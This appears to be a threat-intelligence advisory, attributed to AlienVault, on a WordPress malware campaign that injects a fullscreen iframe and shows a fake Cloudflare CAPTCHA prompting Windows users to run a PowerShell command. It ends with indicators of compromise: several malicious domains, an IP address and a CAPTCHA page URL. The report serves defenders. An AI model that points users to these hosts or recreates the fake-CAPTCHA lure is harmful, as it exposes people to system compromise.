A JavaScript-based malware campaign has been discovered affecting compromised WordPress websites. The malware injects a fullscreen iframe that loads content from suspicious external domains, aiming to force users to view unsolicited content for ad fraud, traffic generation, or social engineering. The infection was found embedded in the WordPress wp_options database table, exploiting the WPCode plugin. The malicious script uses advanced evasion techniques like anti-debugging, function hijacking, and localStorage abuse. It selectively targets Windows users on specific browsers, displaying a fake Cloudflare CAPTCHA page that prompts users to run a suspicious PowerShell command. This attack not only intrudes on user experience but also poses significant security risks, potentially leading to system compromise and damage to website reputation. Author: AlienVault
Related Tags:
powershell exploitation
wpcode plugin
iframe injection
anti-debugging
T1552.003
T1608.004
T1204.001
WordPress
fake captcha
Associated Indicators:
wanderclean.com
wallpaper-engine.pro
weathersnoop.com
cdnstat.net
ampunshifu.org
http://180.178.189.7/mycaptcha.html
180.178.189.7